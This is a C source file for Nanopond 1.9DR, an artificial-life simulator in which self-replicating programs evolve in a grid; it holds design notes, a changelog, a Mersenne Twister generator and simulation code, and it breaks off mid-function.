branch_name
stringclasses 149
values | text
stringlengths 23
89.3M
| directory_id
stringlengths 40
40
| languages
listlengths 1
19
| num_files
int64 1
11.8k
| repo_language
stringclasses 38
values | repo_name
stringlengths 6
114
| revision_id
stringlengths 40
40
| snapshot_id
stringlengths 40
40
|
---|---|---|---|---|---|---|---|---|
refs/heads/master
|
<file_sep>/* *********************************************************************** */
/* */
/* Nanopond version 1.9 -- A teeny tiny artificial life virtual machine */
/* Copyright (C) 2005 <NAME> - http://www.greythumb.com/people/api */
/* */
/* This program is free software; you can redistribute it and/or modify */
/* it under the terms of the GNU General Public License as published by */
/* the Free Software Foundation; either version 2 of the License, or */
/* (at your option) any later version. */
/* */
/* This program is distributed in the hope that it will be useful, */
/* but WITHOUT ANY WARRANTY; without even the implied warranty of */
/* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the */
/* GNU General Public License for more details. */
/* */
/* You should have received a copy of the GNU General Public License */
/* along with this program; if not, write to the Free Software */
/* Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110 USA */
/* */
/* *********************************************************************** */
/*
* Changelog:
*
* 1.0 - Initial release
* 1.1 - Made empty cells get initialized with 0xffff... instead of zeros
* when the simulation starts. This makes things more consistent with
* the way the output buf is treated for self-replication, though
* the initial state rapidly becomes irrelevant as the simulation
* gets going. Also made one or two very minor performance fixes.
* 1.2 - Added statistics for execution frequency and metabolism, and made
* the visualization use 16bpp color.
* 1.3 - Added a few other statistics.
* 1.4 - Replaced SET with KILL and changed EAT to SHARE. The SHARE idea
* was contributed by <NAME> (http://www.falma.de/). KILL
* is a variation on the original EAT that is easier for cells to
* make use of.
* 1.5 - Made some other instruction changes such as XCHG and added a
* penalty for failed KILL attempts. Also made access permissions
* stochastic.
* 1.6 - Made cells all start facing in direction 0. This removes a bit
* of artificiality and requires cells to evolve the ability to
* turn in various directions in order to reproduce in anything but
* a straight line. It also makes pretty graphics.
* 1.7 - Added more statistics, such as original lineage, and made the
* genome dump files CSV files as well.
* 1.8 - Fixed LOOP/REP bug reported by user Sotek. Thanks! Also
* reduced the default mutation rate a bit.
* 1.9 - Added a bunch of changes suggested by <NAME>: a better
* coloring algorithm, right click to switch coloring schemes (two
* are currently supported), and a few speed optimizations. Also
* changed visualization so that cells with generations less than 2
* are no longer shown.
* 1.9DR - Added a bunch of changes and features, some of which are not
* perfectly implemented yet: (1) New key inputs and display settings,
* e.g. =/- increase/decrease energy input. (2) Ability to save/read
* current run to/from a file, and do screenshots to a BMP file. These
* can be set to be done periodically, automatically. (3) Mutations of
* individual living cells, instead of replacement with random genomes.
* (4) Potential speed increases by using memset() and memcpy() instead
* of loops (?) (5) ALLOW_GENOME_WRITE_COMMANDS flag turns on/off the
* commands which allow cell to write to its own genome (WRITEG, XCHG).
* (6) Updated method for determining if cell is "viable". (7) New
* display modes: LOGO and ENERGY (ENERGY is not working correctly).
* (8) Some code reshuffling, e.g. moved cell execution loop to
* executeCell() function. (9) Replaced TURN command with EJECT, eject
* output buffer into neighbor, potentially at a non-zero genome location
* (could allow for parasite/viral/sexual types of behavior). (10)
* added instructions below for compiling on Mac OSX.
*/
/*
* Nanopond is just what it says: a very very small and simple artificial
* life virtual machine.
*
* It is a "small evolving program" based artificial life system of the same
* general class as Tierra, Avida, and Archis. It is written in very tight
* and efficient C code to make it as fast as possible, and is so small that
* it consists of only one .c file.
*
* How Nanopond works:
*
* The Nanopond world is called a "pond." It is an NxN two dimensional
* array of Cell structures, and it wraps at the edges (it's toroidal).
* Each Cell structure consists of a few attributes that are there for
* statistics purposes, an energy level, and an array of POND_DEPTH
* four-bit values. (The four-bit values are actually stored in an array
* of machine-size words.) The array in each cell contains the genome
* associated with that cell, and POND_DEPTH is therefore the maximum
* allowable size for a cell genome.
*
* The first four bit value in the genome is called the "logo." What that is
* for will be explained later. The remaining four bit values each code for
* one of 16 instructions. Instruction zero (0x0) is NOP (no operation) and
* instruction 15 (0xf) is STOP (stop cell execution). Read the code to see
* what the others are. The instructions are exceptionless and lack fragile
* operands. This means that *any* arbitrary sequence of instructions will
* always run and will always do *something*. This is called an evolvable
* instruction set, because programs coded in an instruction set with these
* basic characteristics can mutate. The instruction set is also
* Turing-complete, which means that it can theoretically do anything any
* computer can do. If you're curious, the instruciton set is based on this:
* http://www.muppetlabs.com/~breadbox/bf/ (Brainfuck)
*
* At the center of Nanopond is a core loop. Each time this loop executes,
* a clock counter is incremented and one or more things happen:
*
* - Every REPORT_FREQUENCY clock ticks a line of comma seperated output
* is printed to STDOUT with some statistics about what's going on.
* - Every DUMP_FREQUENCY clock ticks, all viable replicators (cells whose
* generation is >= 2) are dumped to a file on disk.
* - Every INFLOW_FREQUENCY clock ticks a random x,y location is picked,
* energy is added (see INFLOW_RATE_MEAN and INFLOW_RATE_DEVIATION)
* and it's genome is filled with completely random bits. Statistics
* are also reset to generation==0 and parentID==0 and a new cell ID
* is assigned.
* - Every tick a random x,y location is picked and the genome inside is
* executed until a STOP instruction is encountered or the cell's
* energy counter reaches zero. (Each instruction costs one unit energy.)
*
* The cell virtual machine is an extremely simple register machine with
* a single four bit register, one memory pointer, one spare memory pointer
* that can be exchanged with the main one, and an output buffer. When
* cell execution starts, this output buffer is filled with all binary 1's
* (0xffff....). When cell execution is finished, if the first byte of
* this buffer is *not* 0xff, then the VM says "hey, it must have some
* data!". This data is a candidate offspring; to reproduce cells must
* copy their genome data into the output buffer.
*
* When the VM sees data in the output buffer, it looks at the cell
* adjacent to the cell that just executed and checks whether or not
* the cell has permission (see below) to modify it. If so, then the
* contents of the output buffer replace the genome data in the
* adjacent cell. Statistics are also updated: parentID is set to the
* ID of the cell that generated the output and generation is set to
* one plus the generation of the parent.
*
* A cell is permitted to access a neighboring cell if:
* - That cell's energy is zero
* - That cell's parentID is zero
* - That cell's logo (remember?) matches the trying cell's "guess"
*
* Since randomly introduced cells have a parentID of zero, this allows
* real living cells to always replace them or eat them.
*
* The "guess" is merely the value of the register at the time that the
* access attempt occurs.
*
* Permissions determine whether or not an offspring can take the place
* of the contents of a cell and also whether or not the cell is allowed
* to EAT (an instruction) the energy in it's neighbor.
*
* If you haven't realized it yet, this is why the final permission
* criteria is comparison against what is called a "guess." In conjunction
* with the ability to "eat" neighbors' energy, guess what this permits?
*
* Since this is an evolving system, there have to be mutations. The
* MUTATION_RATE sets their probability. Mutations are random variations
* with a frequency defined by the mutation rate to the state of the
* virtual machine while cell genomes are executing. Since cells have
* to actually make copies of themselves to replicate, this means that
* these copies can vary if mutations have occurred to the state of the
* VM while copying was in progress.
*
* What results from this simple set of rules is an evolutionary game of
* "corewar." In the beginning, the process of randomly generating cells
* will cause self-replicating viable cells to spontaneously emerge. This
* is something I call "random genesis," and happens when some of the
* random gak turns out to be a program able to copy itself. After this,
* evolution by natural selection takes over. Since natural selection is
* most certainly *not* random, things will start to get more and more
* ordered and complex (in the functional sense). There are two commodities
* that are scarce in the pond: space in the NxN grid and energy. Evolving
* cells compete for access to both.
*
* If you want more implementation details such as the actual instruction
* set, read the source. It's well commented and is not that hard to
* read. Most of it's complexity comes from the fact that four-bit values
* are packed into machine size words by bit shifting. Once you get that,
* the rest is pretty simple.
*
* Nanopond, for it's simplicity, manifests some really interesting
* evolutionary dynamics. While I haven't run the kind of multiple-
* month-long experiment necessary to really see this (I might!), it
* would appear that evolution in the pond doesn't get "stuck" on just
* one or a few forms the way some other simulators are apt to do.
* I think simplicity is partly reponsible for this along with what
* biologists call embeddedness, which means that the cells are a part
* of their own world.
*
* Run it for a while... the results can be... interesting!
*
* Running Nanopond:
*
* Nanopond can use SDL (Simple Directmedia Layer) for screen output. If
* you don't have SDL, comment out USE_SDL below and you'll just see text
* statistics and get genome data dumps. (Turning off SDL will also speed
* things up slightly.)
*
* After looking over the tunable parameters below, compile Nanopond and
* run it. Here are some example compilation commands from Linux:
*
* For Pentiums:
* gcc -O6 -march=pentium -funroll-loops -fomit-frame-pointer -s
* -o nanopond nanopond.c -lSDL
*
* For Athlons with gcc 4.0+:
* gcc -O6 -msse -mmmx -march=athlon -mtune=athlon -ftree-vectorize
* -funroll-loops -fomit-frame-pointer -o nanopond nanopond.c -lSDL
*
* On Mac OS X, I have done it using Fink's version of SDL:
* gcc -fast -floop-optimize -finline-functions -fstrength-reduce -o nanopond
* nanopond-1.9.c -lSDL -lSDLmain -I/sw/include -L/sw/lib -framework Cocoa
* -OR-
* gcc -fast -floop-optimize -finline-functions -fstrength-reduce
* -o nanopond nanopond-1.9.c -D_MSC_VER
* `/sw/bin/sdl-config --prefix=/sw --libs --cflags`
*
* The second line is for gcc 4.0 or newer and makes use of GCC's new
* tree vectorizing feature. This will speed things up a bit by
* compiling a few of the loops into MMX/SSE instructions.
*
* This should also work on other Posix-compliant OSes with relatively
* new C compilers. (Really old C compilers will probably not work.)
* On other platforms, you're on your own! On Windows, you will probably
* need to find and download SDL if you want pretty graphics and you
* will need a compiler. MinGW and Borland's BCC32 are both free. I
* would actually expect those to work better than Microsoft's compilers,
* since MS tends to ignore C/C++ standards. If stdint.h isn't around,
* you can fudge it like this:
*
* #define uintptr_t unsigned long (or whatever your machine size word is)
* #define uint8_t unsigned char
* #define uint16_t unsigned short
* #define uint64_t unsigned long long (or whatever is your 64-bit int)
*
* When Nanopond runs, comma-seperated stats (see doReport() for
* the columns) are output to stdout and various messages are output
* to stderr. For example, you might do:
*
* ./nanopond >>stats.csv 2>messages.txt &
*
* To get both in seperate files.
*
* <plug>
* Be sure to visit http://www.greythumb.com/blog for your dose of
* technobiology related news. Also, if you're ever in the Boston
* area, visit http://www.greythumb.com/bostonalife to find out when
* our next meeting is!
* </plug>
*
* Have fun!
*/
/* ----------------------------------------------------------------------- */
/* Tunable parameters */
/* ----------------------------------------------------------------------- */
/* Iteration to stop at. Comment this out to run forever. */
/* #define STOP_AT 150000000000ULL */
/* Size of pond in X and Y dimensions. */
#define POND_SIZE_X 800 //640
#define POND_SIZE_Y 600 //480
/* Frequency of comprehensive reports-- lower values will provide more
* info while slowing down the simulation. Higher values will give less
* frequent updates. */
#define REPORT_FREQUENCY ( 20 * POND_SIZE_X * POND_SIZE_Y ) /*10000000*/
/* Frequency at which to dump all viable replicators (generation > 2)
* to a file named <clock>.dump in the current directory. Comment
* out to disable. The cells are dumped in hexadecimal, which is
* semi-human-readable if you look at the big switch() statement
* in the main loop to see what instruction is signified by each
* four-bit value. */
/* #define DUMP_FREQUENCY ( 10 * REPORT_FREQUENCY ) /*100000000*/
/* Mutation rate -- range is from 0 (none) to 0xffffffff (all mutations!) */
/* To get it from a float probability from 0.0 to 1.0, multiply it by
* 4294967295 (0xffffffff) and round. */
#define MUTATION_RATE 21475 /* p=~0.000005 */
/* How frequently should random cells / energy be introduced?
* Making this too high makes things very chaotic. Making it too low
* might not introduce enough energy. */
#define INFLOW_FREQUENCY 100
/* Base amount of energy to introduce per INFLOW_FREQUENCY ticks */
#define INFLOW_RATE_BASE 4000
/* A random amount of energy between 0 and this is added to
* INFLOW_RATE_BASE when energy is introduced. Comment this out for
* no variation in inflow rate. */
#define INFLOW_RATE_VARIATION 8000
/* Depth of pond in four-bit codons -- this is the maximum
* genome size. This *must* be a multiple of 16! */
#define POND_DEPTH 512
/* This is the divisor that determines how much energy is taken
* from cells when they try to KILL a viable cell neighbor and
* fail. Higher numbers mean lower penalties. */
#define FAILED_KILL_PENALTY 2
/* Define this to use SDL. To use SDL, you must have SDL headers
* available and you must link with the SDL library when you compile. */
/* Comment this out to compile without SDL visualization support. */
#define USE_SDL 1
/* This is the frequency of screen refreshes if SDL is enabled. */
#define SDL_UPDATE_FREQUENCY (POND_SIZE_X * POND_SIZE_Y / 2) /*200000*/
/* This says enable commands which allow the cell to modify its own genome */
#define ALLOW_GENOME_WRITE_COMMANDS 1
/* ----------------------------------------------------------------------- */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#ifdef USE_SDL
#ifdef _MSC_VER
#include <unistd.h> /* for the pause function */
#include <SDL.h>
#else
#include <SDL/SDL.h>
#endif /* _MSC_VER */
#endif /* USE_SDL */
/* ----------------------------------------------------------------------- */
/* This is the Mersenne Twister by <NAME> and <NAME> */
/* http://www.math.sci.hiroshima-u.ac.jp/~m-mat/MT/MT2002/emt19937ar.html */
/* ----------------------------------------------------------------------- */
/* A few very minor changes were made by me - Adam */
/*
A C-program for MT19937, with initialization improved 2002/1/26.
Coded by <NAME> and <NAME>.
Before using, initialize the state by using init_genrand(seed)
or init_by_array(init_key, key_length).
Copyright (C) 1997 - 2002, <NAME> and <NAME>,
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
1. Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
3. The names of its contributors may not be used to endorse or promote
products derived from this software without specific prior written
permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
Any feedback is very welcome.
http://www.math.sci.hiroshima-u.ac.jp/~m-mat/MT/emt.html
email: m-<EMAIL> (remove space)
*/
/* Period parameters */
#define N 624
#define M 397
#define MATRIX_A 0x9908b0dfUL /* constant vector a */
#define UPPER_MASK 0x80000000UL /* most significant w-r bits */
#define LOWER_MASK 0x7fffffffUL /* least significant r bits */
static unsigned long mt[N]; /* the array for the state vector */
static int mti=N+1; /* mti==N+1 means mt[N] is not initialized */
/* initializes mt[N] with a seed */
static void init_genrand(unsigned long s)
{
mt[0]= s & 0xffffffffUL;
for (mti=1; mti<N; mti++) {
mt[mti] =
(1812433253UL * (mt[mti-1] ^ (mt[mti-1] >> 30)) + mti);
/* See Knuth TAOCP Vol2. 3rd Ed. P.106 for multiplier. */
/* In the previous versions, MSBs of the seed affect */
/* only MSBs of the array mt[]. */
/* 2002/01/09 modified by <NAME> */
mt[mti] &= 0xffffffffUL;
/* for >32 bit machines */
}
}
/* generates a random number on [0,0xffffffff]-interval */
static inline uint32_t genrand_int32()
{
uint32_t y;
static uint32_t mag01[2]={0x0UL, MATRIX_A};
/* mag01[x] = x * MATRIX_A for x=0,1 */
if (mti >= N) { /* generate N words at one time */
int kk;
for (kk=0;kk<N-M;kk++) {
y = (mt[kk]&UPPER_MASK)|(mt[kk+1]&LOWER_MASK);
mt[kk] = mt[kk+M] ^ (y >> 1) ^ mag01[y & 0x1UL];
}
for (;kk<N-1;kk++) {
y = (mt[kk]&UPPER_MASK)|(mt[kk+1]&LOWER_MASK);
mt[kk] = mt[kk+(M-N)] ^ (y >> 1) ^ mag01[y & 0x1UL];
}
y = (mt[N-1]&UPPER_MASK)|(mt[0]&LOWER_MASK);
mt[N-1] = mt[M-1] ^ (y >> 1) ^ mag01[y & 0x1UL];
mti = 0;
}
y = mt[mti++];
/* Tempering */
y ^= (y >> 11);
y ^= (y << 7) & 0x9d2c5680UL;
y ^= (y << 15) & 0xefc60000UL;
y ^= (y >> 18);
return y;
}
/* ----------------------------------------------------------------------- */
/* Pond depth in machine-size words. This is calculated from
* POND_DEPTH and the size of the machine word. (The multiplication
* by two is due to the fact that there are two four-bit values in
* each eight-bit byte.) */
#define POND_DEPTH_SYSWORDS (POND_DEPTH / (sizeof(uintptr_t) * 2))
#define POND_DEPTH_BYTES (POND_DEPTH / 2)
/* Number of bits in a machine-size word */
#define SYSWORD_BITS (sizeof(uintptr_t) * 8)
/* Constants representing neighbors in the 2D grid. */
#define N_LEFT 0
#define N_RIGHT 1
#define N_UP 2
#define N_DOWN 3
/* Word and bit at which to start execution */
/* This is after the "logo" */
#define EXEC_START_WORD 0
#define EXEC_START_BIT 4
/* Number of bits set in binary numbers 0000 through 1111 */
static const uintptr_t BITS_IN_FOURBIT_WORD[16] = { 0,1,1,2,1,2,2,3,1,2,2,3,2,3,3,4 };
/**
* Structure for a cell in the pond
*/
struct Cell
{
/* Globally unique cell ID */
uint64_t ID;
/* ID of the cell's parent */
uint64_t parentID;
/* Counter for original lineages -- equal to the cell ID of
* the first cell in the line. */
uint64_t lineage;
/* Generations start at 0 and are incremented from there. */
uintptr_t generation;
/* Count number of children this cell has spawned. */
uintptr_t children;
/* Energy level of this cell */
uintptr_t energy;
/* Memory space for cell genome (genome is stored as four
* bit instructions packed into machine size words) */
uintptr_t genome[POND_DEPTH_SYSWORDS];
};
/* The pond is a 2D array of cells */
struct Cell pond[POND_SIZE_X][POND_SIZE_Y];
/* Currently selected color scheme */
enum { KINSHIP,LOGO,LINEAGE,ENERGY,MAX_COLOR_SCHEME } colorScheme = KINSHIP;
const char *colorSchemeName[4] = { "KINSHIP", "LOGO", "LINEAGE", "ENERGY" };
/**
* Get a random number
*
* @return Random number
*/
static inline uintptr_t getRandom()
{
/* A good optimizing compiler should optimize out this if */
/* This is to make it work on 64-bit boxes */
if (sizeof(uintptr_t) == 8)
return (uintptr_t)((((uint64_t)genrand_int32()) << 32) ^ ((uint64_t)genrand_int32()));
else return (uintptr_t)genrand_int32();
}
/**
* Structure for keeping some running tally type statistics
*/
struct PerReportStatCounters
{
/* Counts for the number of times each instruction was
* executed since the last report. */
double instructionExecutions[16];
/* Number of cells executed since last report */
double cellExecutions;
/* Number of viable cells replaced by other cells' offspring */
uintptr_t viableCellsReplaced;
/* Number of viable cells KILLed */
uintptr_t viableCellsKilled;
/* Number of successful SHARE operations */
uintptr_t viableCellShares;
};
/* Global statistics counters */
struct PerReportStatCounters statCounters;
/**
* Function to decide if a cell is "viable" or not
*
* @param c Cell to determine if viable
*/
static inline int cellIsViable(struct Cell *const c)
{
return ( c->generation > 1 && c->children ) ? 1 : 0;
}
/**
* Function to decide if a cell is "alive" or not (i.e. viable with energy)
*
* @param c Cell to determine if viable
*/
static inline int cellIsAlive(struct Cell *const c)
{
return ( c->generation > 1 && c->children && c->energy ) ? 1 : 0;
}
/**
* Output a line of comma-seperated statistics data
*
* @param clock Current clock
*/
static void doReport(FILE *file, const uint64_t clock)
{
static uint64_t lastTotalViableReplicators = 0;
uintptr_t x,y;
uint64_t totalActiveCells = 0;
uint64_t totalEnergy = 0;
uint64_t totalViableReplicators = 0;
uintptr_t maxGeneration = 0;
uintptr_t maxChildren = 0;
for(x=0;x<POND_SIZE_X;++x) {
for(y=0;y<POND_SIZE_Y;++y) {
struct Cell *const c = &pond[x][y];
if (c->energy) {
++totalActiveCells;
totalEnergy += (uint64_t)c->energy;
if ( cellIsViable( c ) )
++totalViableReplicators;
if (c->generation > maxGeneration)
maxGeneration = c->generation;
if (c->children > maxChildren)
maxChildren = c->children;
}
}
}
/* Look here to get the columns in the CSV output */
/* The first five are here and are self-explanatory */
fprintf(file, "%llu,%llu,%llu,%llu,%llu,%llu,%llu,%llu,%llu",
(uint64_t)clock,
(uint64_t)totalEnergy,
(uint64_t)totalActiveCells,
(uint64_t)totalViableReplicators,
(uint64_t)maxGeneration,
(uint64_t)maxChildren,
(uint64_t)statCounters.viableCellsReplaced,
(uint64_t)statCounters.viableCellsKilled,
(uint64_t)statCounters.viableCellShares
);
/* The next 16 are the average frequencies of execution for each
* instruction per cell execution. */
double totalMetabolism = 0.0;
for(x=0;x<16;++x) {
totalMetabolism += statCounters.instructionExecutions[x];
fprintf(file,",%.4f",(statCounters.cellExecutions > 0.0) ? (statCounters.instructionExecutions[x] / statCounters.cellExecutions) : 0.0);
}
/* The last column is the average metabolism per cell execution */
fprintf(file,",%.4f\n",(statCounters.cellExecutions > 0.0) ? (totalMetabolism / statCounters.cellExecutions) : 0.0);
fflush(file/*stdout*/);
if ((lastTotalViableReplicators > 0)&&(totalViableReplicators == 0))
fprintf(stderr,"[EVENT] Viable replicators have gone extinct. Please reserve a moment of silence.\n");
else if ((lastTotalViableReplicators == 0)&&(totalViableReplicators > 0))
fprintf(stderr,"[EVENT] Viable replicators have appeared!\n");
lastTotalViableReplicators = totalViableReplicators;
/* Reset per-report stat counters */
//for(x=0;x<sizeof(statCounters);++x)
// ((uint8_t *)&statCounters)[x] = (uint8_t)0;
memset( &statCounters, sizeof( statCounters ), 0 );
}
/**
* Gets the color that a cell should be
*
* @param c Cell to get color for
* @return 8-bit color value
*/
#ifdef USE_SDL
static inline uint8_t getColor(struct Cell *c)
{
uintptr_t i,j,word,sum,opcode;
#ifdef ALLOW_GENOME_WRITE_COMMANDS
uintptr_t skipnext;
#endif
if (c->energy) {
switch(colorScheme) {
case KINSHIP:
/*
* Kinship color scheme by <NAME>
*
* For cells of generation > 1, saturation and value are set to maximum.
* Hue is a hash-value with the property that related genomes will have
* similar hue (but of course, as this is a hash function, totally
* different genomes can also have a similar or even the same hue).
* Therefore the difference in hue should to some extent reflect the grade
* of "kinship" of two cells.
*/
if ( cellIsAlive( c ) ) { //c->generation ) { //
sum = 0;
#ifdef ALLOW_GENOME_WRITE_COMMANDS
skipnext = 0;
#endif
for(i=0;i<4/*POND_DEPTH_SYSWORDS*/&&(c->genome[i] != ~((uintptr_t)0));++i) {
word = c->genome[i];
for(j=0;j<SYSWORD_BITS/4;++j,word >>= 4) {
/* We ignore 0xf's here, because otherwise very similar genomes
* might get quite different hash values in the case when one of
* the genomes is slightly longer and uses one more maschine
* word. */
opcode = word & 0xf;
#ifdef ALLOW_GENOME_WRITE_COMMANDS
if (skipnext)
skipnext = 0;
else {
#endif
if (opcode != 0xf)
sum += opcode;
#ifdef ALLOW_GENOME_WRITE_COMMANDS
if (opcode == 0xc) /* 0xc == XCHG */
skipnext = 1; /* Skip "operand" after XCHG */
#endif
}
}
}
/* For the hash-value use a wrapped around sum of the sum of all
* commands and the length of the genome. */
return (uint8_t)((sum % 192) + 64);
}
return 0;
case LOGO:
/*
* Cells with generation > 1 are color-coded by their logo.
*/
return ( cellIsAlive( c ) ) ? //c->generation ) ?
(((uint8_t)c->genome[0]) | (uint8_t)1) : 0;
case LINEAGE:
/*
* Cells with generation > 1 are color-coded by lineage.
*/
return ( cellIsAlive( c ) ) ? //c->generation ) ?
(((uint8_t)c->lineage) | (uint8_t)1) : 0;
case ENERGY:
/*
* Plot the energy available in each cell as a grey-scale.
*/
return (((uint8_t)c->energy) & (uint8_t)0xff);
case MAX_COLOR_SCHEME:
/* ... never used... to make compiler shut up. */
break;
}
}
return 0; /* Cells with no energy are black */
}
#endif
/**
* Dumps the genome of a cell to a file.
*
* @param file Destination
* @param cell Source
* @param x X coord of cell
* @param y Y coord of cell
* @param findClosest boolean - find the closest cell to (x,y) that's alive?
*/
static int dumpCell(FILE *file, struct Cell *cell, uintptr_t x, uintptr_t y, int findClosest)
{
uintptr_t wordPtr,shiftPtr,inst,stopCount,i;
uint8_t color;
/* Find cell closest to this one if this one is not alive (for mouse presses, mostly) */
if ( findClosest && ! ( cellIsAlive( cell ) ) ) {
i = 0;
while( i ++ < 5 && ! ( cellIsAlive( cell ) ) ) {
cell = &pond[x+i][y]; if ( cellIsAlive( cell ) ) break;
cell = &pond[x-i][y]; if ( cellIsAlive( cell ) ) break;
cell = &pond[x][y+i]; if ( cellIsAlive( cell ) ) break;
cell = &pond[x][y-i]; if ( cellIsAlive( cell ) ) break;
cell = &pond[x+i][y+i]; if ( cellIsAlive( cell ) ) break;
cell = &pond[x-i][y-i]; if ( cellIsAlive( cell ) ) break;
cell = &pond[x-i][y+i]; if ( cellIsAlive( cell ) ) break;
cell = &pond[x+i][y-i]; if ( cellIsAlive( cell ) ) break;
}
}
if ( cellIsAlive( cell ) ) {
fprintf(file,"%d,%d,%llu,%llu,%llu,%llu,%llu,%llu,",
x, y,
(uint64_t)cell->ID,
(uint64_t)cell->parentID,
(uint64_t)cell->lineage,
(uint64_t)cell->generation,
(uint64_t)cell->children,
(uint64_t)cell->energy);
#ifdef USE_SDL
color = getColor(cell);
#else
color = cell->genome[0];
#endif
fprintf(file,"%2x,",color);
wordPtr = 0;
shiftPtr = 0;
stopCount = 0;
for(i=0;i<POND_DEPTH;++i) {
inst = (cell->genome[wordPtr] >> shiftPtr) & 0xf;
/* Four STOP instructions in a row is considered the end.
* The probability of this being wrong is *very* small, and
* could only occur if you had four STOPs in a row inside
* a LOOP/REP pair that's always false. In any case, this
* would always result in our *underestimating* the size of
* the genome and would never result in an overestimation. */
fprintf(file,"%x",inst);
if (inst == 0xf) { /* STOP */
if (++stopCount >= 4)
break;
} else stopCount = 0;
if ((shiftPtr += 4) >= SYSWORD_BITS) {
if (++wordPtr >= POND_DEPTH_SYSWORDS) {
wordPtr = EXEC_START_WORD;
shiftPtr = EXEC_START_BIT;
} else shiftPtr = 0;
}
}
fprintf(file,"\n");
return( 1 );
}
return( 0 );
}
/**
* Dumps all viable (generation > 2) cells to a file called <clock>.dump
*
* @param clock Clock value
*/
static int doDump(const uint64_t clock)
{
char buf[POND_DEPTH*2];
FILE *d;
uintptr_t x,y,wordPtr,shiftPtr,inst,stopCount,i;
int ok;
struct Cell *pptr;
if ( clock == 0 ) return;
sprintf(buf,"%012llu.dump.csv",clock);
d = fopen(buf,"w");
if (!d) {
fprintf(stderr,"[WARNING] Could not open %s for writing.\n",buf);
return;
}
ok = 0;
for(x=0;x<POND_SIZE_X;++x)
for(y=0;y<POND_SIZE_Y;++y)
if (dumpCell(d, &pond[x][y], x, y, 0)) ok = 1;
fclose(d);
if ( !ok ) remove( buf );
else fprintf(stderr,"[INFO] Dumping viable cells to %s\n",buf);
return( ok );
}
/**
* Save a screen shot to a bitmap (bmp) file.
*
* @param clock Clock value
* @param screen SDL screen pointer
*/
#ifdef USE_SDL
static void doScreenshot(const uint64_t clock, SDL_Surface *screen)
{
char buf[POND_DEPTH*2];
if ( clock == 0 ) return;
sprintf(buf,"%012llu.scrn.bmp",clock);
fprintf(stderr,"[INFO] Saving screenshot to %s\n",buf);
SDL_SaveBMP(screen, buf);
}
static void doSaveOpen(const int8_t saveOpen, uint64_t *clock, uint64_t *cellIdCounter)
{
char buf[POND_DEPTH*2];
int i;
FILE *d;
if ( *clock == 0 ) return;
sprintf(buf,"%012llu.dump.bin",*clock);
if ( saveOpen == 's' ) {
d = fopen(buf,"w");
if (!d) {
fprintf(stderr,"[WARNING] Could not open %s for writing.\n",buf);
return;
}
fprintf(stderr,"[INFO] Saving memory dump to %s\n",buf);
fwrite( clock, sizeof(uint64_t), 1, d );
fwrite( cellIdCounter, sizeof(uint64_t), 1, d );
fwrite( &statCounters, sizeof(struct PerReportStatCounters), 1, d );
for (i=0; i<POND_SIZE_X; i++ )
fwrite( &(pond[i][0]), sizeof(struct Cell), POND_SIZE_Y, d );
} else if ( saveOpen == 'o' ) {
d = fopen(buf,"r");
if (!d) {
fprintf(stderr,"[WARNING] Could not open %s for reading.\n",buf);
return;
}
fprintf(stderr,"[INFO] Reading memory dump from %s\n",buf);
fread( clock, sizeof(uint64_t), 1, d );
fread( cellIdCounter, sizeof(uint64_t), 1, d );
fread( &statCounters, sizeof(struct PerReportStatCounters), 1, d );
for (i=0; i<POND_SIZE_X; i++ )
fread( &(pond[i][0]), sizeof(struct Cell), POND_SIZE_Y, d );
}
fclose(d);
}
/*
* Move resetting into its own function so it can be called (e.g. by 'r' key press)
*/
static void reset() {
uintptr_t i,x,y;
for(x=0;x<POND_SIZE_X;++x) {
for(y=0;y<POND_SIZE_Y;++y) {
pond[x][y].ID = pond[x][y].parentID = pond[x][y].lineage = 0;
pond[x][y].generation = pond[x][y].children = pond[x][y].energy = 0;
memset( pond[x][y].genome, POND_DEPTH_BYTES, 0xff );
}
}
/* Reset per-report stat counters */
memset( &statCounters, sizeof( statCounters ), 0 );
}
#endif
/**
* Get a neighbor in the pond
*
* @param x Starting X position
* @param y Starting Y position
* @param dir Direction to get neighbor from
* @return Pointer to neighboring cell
*/
static inline struct Cell *getNeighbor(const uintptr_t x,const uintptr_t y,const uintptr_t dir)
{
/* Space is toroidal; it wraps at edges */
switch(dir) {
case N_LEFT:
return (x) ? &pond[x-1][y] : &pond[POND_SIZE_X-1][y];
case N_RIGHT:
return (x < (POND_SIZE_X-1)) ? &pond[x+1][y] : &pond[0][y];
case N_UP:
return (y) ? &pond[x][y-1] : &pond[x][POND_SIZE_Y-1];
case N_DOWN:
return (y < (POND_SIZE_Y-1)) ? &pond[x][y+1] : &pond[x][0];
}
return &pond[x][y]; /* This should never be reached */
}
/**
* Determines if c1 is allowed to access c2
*
* @param c2 Cell being accessed
* @param c1guess c1's "guess"
* @param sense The "sense" of this interaction
* @return True or false (1 or 0)
*/
static inline int accessAllowed(struct Cell *const c2,const uintptr_t c1guess,int sense)
{
/* Access permission is more probable if they are more similar in sense 0,
* and more probable if they are different in sense 1. Sense 0 is used for
* "negative" interactions and sense 1 for "positive" ones. */
